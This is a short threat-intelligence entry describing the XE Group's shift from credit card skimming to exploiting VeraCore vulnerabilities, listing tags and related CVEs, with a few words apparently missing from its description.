216.73.217.50

From Credit Card Skimming to Exploiting Zero-Days

· Published 03/02/2025 20:13 · Modified 04/02/2025 07:21

Export JSON

Essential information

Published
03/02/2025 20:13
Modified
04/02/2025 07:21
Tags
2025-02-03 CVE-2024-57968 CVE-2025-25181 aspxspy information theft meterpreter persistent access powershell remote access trojan sql injection supply chain attack webshell zero-day
Related entities
4 vulnerabilities (cve), 17 observables, 1 intrusion sets (apt), 17 techniques (mitre), 3 malware, 2 others

Description

XE Group, a cybercriminal organization active since 2013, has evolved from credit card skimming to exploiting vulnerabilities. The group initially focused on web vulnerabilities and supply chain attacks but has now shifted to targeted in manufacturing and distribution sectors. They have demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software, including an flaw and an upload validation vulnerability. XE Group maintains long-term access to compromised systems, as evidenced by their reactivation of a planted years earlier. Their recent activities involve exfiltrating config files, network reconnaissance, and deploying a using obfuscated commands. The group's evolution highlights their adaptability and growing threat to supply chain security.

External references